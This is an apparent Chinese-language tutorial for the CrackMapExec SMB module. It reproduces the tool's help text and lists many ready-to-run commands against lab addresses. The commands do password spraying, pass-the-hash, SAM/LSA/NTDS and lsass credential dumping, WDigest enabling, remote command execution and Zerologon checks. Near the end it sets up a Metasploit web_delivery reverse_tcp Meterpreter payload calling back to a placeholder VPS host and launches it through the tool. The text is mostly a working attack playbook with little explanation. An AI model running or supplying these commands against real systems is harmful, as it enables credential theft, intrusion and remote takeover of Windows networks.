全网找不到比我更详细的crackmapexec smb教程

1. wmiexec: executes commands via WMI2. atexec: executes commands by scheduling a task with windows task scheduler3. smbexec: executes commands by creating and running a service

python cme -h-----optional arguments:  -h, --help            show this help message and exit  -t THREADS            set how many concurrent threads to use (default: 100)  --timeout TIMEOUT     max timeout in seconds of each thread (default: None)  --jitter INTERVAL     sets a random delay between each connection (default: None)  --darrell             give Darrell a hand  --verbose             enable verbose output

protocols:  available protocols  {ftp,ldap,mssql,rdp,smb,ssh,winrm}    ftp                 own stuff using FTP    ldap                own stuff using LDAP    mssql               own stuff using MSSQL    rdp                 own stuff using RDP    smb                 own stuff using SMB    ssh                 own stuff using SSH    winrm               own stuff using WINRM

optional arguments:  -h, --help            show this help message and exit  -id CRED_ID [CRED_ID ...]                        database credential ID(s) to use for authentication  -u USERNAME [USERNAME ...]                        username(s) or file(s) containing usernames  -p PASSWORD [PASSWORD ...]                        password(s) or file(s) containing passwords  -k, --kerberos        Use Kerberos authentication  --use-kcache          Use Kerberos authentication from ccache file (KRB5CCNAME)  --export EXPORT [EXPORT ...]                        Export result into a file, probably buggy  --aesKey AESKEY [AESKEY ...]                        AES key to use for Kerberos Authentication (128 or 256 bits)  --kdcHost KDCHOST     FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter  --gfail-limit LIMIT   max number of global failed login attempts  --ufail-limit LIMIT   max number of failed login attempts per username  --fail-limit LIMIT    max number of failed login attempts per host  -M MODULE, --module MODULE                        module to use  -o MODULE_OPTION [MODULE_OPTION ...]                        module options  -L, --list-modules    list available modules  --options             display module options  --server {https,http}                        use the selected server (default: https)  --server-host HOST    IP to bind the server to (default: 0.0.0.0)  --server-port PORT    start the server on the specified port  --connectback-host CHOST                        IP for the remote system to connect back to (default: same as server-host)  -H HASH [HASH ...], --hash HASH [HASH ...]                        NTLM hash(es) or file(s) containing NTLM hashes  --no-bruteforce       No spray when using file for username and password (user1 => password1, user2 => password2  --continue-on-success                        continues authentication attempts even after successes

  -d DOMAIN             domain to authenticate to  --local-auth          authenticate locally to each target  --port {139,445}      SMB port (default: 445)  --share SHARE         specify a share (default: C$)  --smb-server-port SMB_SERVER_PORT                        specify a server port for SMB  --gen-relay-list OUTPUT_FILE                        outputs all hosts that do not require SMB signing to the specified file  --smb-timeout SMB_TIMEOUT                        SMB connection timeout, default 2 secondes  --laps [LAPS]         LAPS authentification

Credential Gathering:  Options for gathering credentials  --sam                 dump SAM hashes from target systems  --lsa                 dump LSA secrets from target systems  --ntds [{drsuapi,vss}]                        dump the NTDS.dit from target DCs using the specifed method (default: drsuapi)Credential Gathering:  Options for gathering credentials  --enabled             Only dump enabled targets from DC  --user USERNTDS       Dump selected user from DC  # --local-auth          authenticate locally to each target 

python cme smb 192.168.174.149 -u three -p "npc@three" -X whoami --local-auth

Mapping/Enumeration:  Options for Mapping/Enumerating  --shares              enumerate shares and access  --sessions            enumerate active sessions  --disks               enumerate disks  --loggedon-users-filter LOGGEDON_USERS_FILTER                        only search for specific user, works with regex  --loggedon-users      enumerate logged on users  --users [USER]        enumerate domain users, if a user is specified than only its information is queried.  --groups [GROUP]      enumerate domain groups, if a group is specified than its members are enumerated  --computers [COMPUTER]                        enumerate computer users  --local-groups [GROUP]                        enumerate local groups, if a group is specified then its members are enumerated  --pass-pol            dump password policy  --rid-brute [MAX_RID]                        enumerate users by bruteforcing RID's (default: 4000)  --wmi QUERY           issues the specified WMI query  --wmi-namespace NAMESPACE                        WMI Namespace (default: rootcimv2)

  Spidering:  Options for spidering shares  --spider SHARE        share to spider  --spider-folder FOLDER                        folder to spider (default: root share directory)  --content             enable file content searching  --exclude-dirs DIR_LIST                        directories to exclude from spidering  --pattern PATTERN [PATTERN ...]                        pattern(s) to search for in folders, filenames and file content  --regex REGEX [REGEX ...]                        regex(s) to search for in folders, filenames and file content  --depth DEPTH         max spider recursion depth (default: infinity & beyond)  --only-files          only spider files

Files:  Options for put and get remote files  --put-file FILE FILE  Put a local file into remote target, ex: whoami.txt \Windows\Temp\whoami.txt  --get-file FILE FILE  Get a remote file, ex: \Windows\Temp\whoami.txt whoami.txt

Command Execution:  Options for executing commands  --exec-method {smbexec,wmiexec,mmcexec,atexec}                        method to execute the command. Ignored if in MSSQL mode (default: wmiexec)  --codec CODEC         Set encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the                          result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the                        corresponding codec  --force-ps32          force the PowerShell command to run in a 32-bit process  --no-output           do not retrieve command output  -x COMMAND            execute the specified command  -X PS_COMMAND         execute the specified PowerShell command

Powershell Obfuscation:  Options for PowerShell script obfuscation  --obfs                Obfuscate PowerShell scripts  --amsi-bypass FILE    File with a custom AMSI bypass  --clear-obfscripts    Clear all cached obfuscated PowerShell scripts

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --users

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --groups

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --shares

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --sessions

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --spider C$ --pattern txt

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --spider C$ --pattern log

python cme smb 192.168.174.0/24 -u "sky" "Administrator" -p "Thr33!@#"

python cme smb 192.168.174.0/24 -u "Administrator" -p "password1" "password2" "Thr33!@#"

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --lsa

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --ntds drsuapi

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --ntds vss

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -M lsassy

python cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605"

python cme smb 192.168.174.146 -u user.txt -p "Thr33$4" --rid-brute

python cme smb 192.168.174.146 -u user.txt -p "Thr33$4" --continue-on-success

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -x quser --codec gbkpython cme smb 192.168.174.146 -u "Administrator" -H "

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -X whoami python cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605" -X whoami

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -x "net user Administrator /domain" --exec-method atexec --codec gbk

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -x "net user Administrator /domain" --exec-method wmiexec --codec gbkpython cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -X "$PSVersionTable" --exec-method wmiexec --codec gbkpython cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" --wmi "select Name from Win32_UserAccount"

# View all the modulespython cme smb -L-----[*] bh_owned                  Set pwned computer as owned in Bloodhound[*] dfscoerce                 Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam[*] drop-sc                   Drop a searchConnector-ms file on each writable share[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it[*] enum_avproducts           Gathers information on all endpoint protection solutions installed on the the remote host(s) via WMI[*] enum_dns                  Uses WMI to dump DNS from an AD DNS Server[*] get_netconnections        Uses WMI to query network connections.[*] gpp_autologin             Searches the domain controller for registry.xml to find autologon information and returns the username and password.[*] gpp_password              Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.[*] handlekatz                Get lsass dump using handlekatz64 and parse the result with pypykatz[*] hash_spider               Dump lsass recursively from a given hash using BH to find local admins[*] impersonate               List and impersonate tokens to run command as locally logged on users[*] install_elevated          Checks for AlwaysInstallElevated[*] ioxidresolver             Thie module helps you to identify hosts that have additional active interfaces[*] keepass_discover          Search for KeePass-related files and process.[*] keepass_trigger           Set up a malicious KeePass trigger to export the database in cleartext.[*] lsassy                    Dump lsass and parse the result remotely with lsassy[*] masky                     Remotely dump domain user credentials via an ADCS and a KDC[*] met_inject                Downloads the Meterpreter stager and injects it into memory[*] ms17-010                  MS17-010, /! not tested oustide home lab[*] nanodump                  Get lsass dump using nanodump and parse the result with pypykatz[*] nopac                     Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user[*] ntlmv1                    Detect if lmcompatibilitylevel on the target is set to 0 or 1[*] petitpotam                Module to check if the DC is vulnerable to PetitPotam, credit to @topotam[*] procdump                  Get lsass dump using procdump64 and parse the result with pypykatz[*] rdp                       Enables/Disables RDP[*] runasppl                  Check if the registry value RunAsPPL is set or not[*] scuffy                    Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares[*] shadowcoerce              Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam[*] slinky                    Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions[*] spider_plus               List files on the target server (excluding `DIR` directories and `EXT` extensions) and save them to the `OUTPUT` directory if they are smaller then `SIZE`[*] spooler                   Detect if print spooler is enabled or not[*] teams_localdb             Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process[*] test_connection           Pings a host[*] uac                       Checks UAC status[*] wdigest                   Creates/Deletes the "UseLogonCredential" registry key enabling WDigest cred dumping on Windows >= 8.1[*] web_delivery              Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module[*] webdav                    Checks whether the WebClient service is running on the target[*] wireless                  Get key of all wireless interfaces[*] zerologon                 Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -M lsassy

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -M wdigest -o ACTION=enable

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -M enum_dns

use exploit/multi/script/web_deliveryset target 2set payload windows/x64/meterpreter/reverse_tcpset lhost <YOUR_VPS_IP>set lport 8888set srvhost 0.0.0.0set srvport 6666exploit

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -M web_delivery -o URL=http://<YOUR_VPS_IP>:6666/6XBQfG

python cme smb 192.168.174.146 -u "Administrator" -p "Thr33!@#" -M zerologonpython cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605" -M zerologon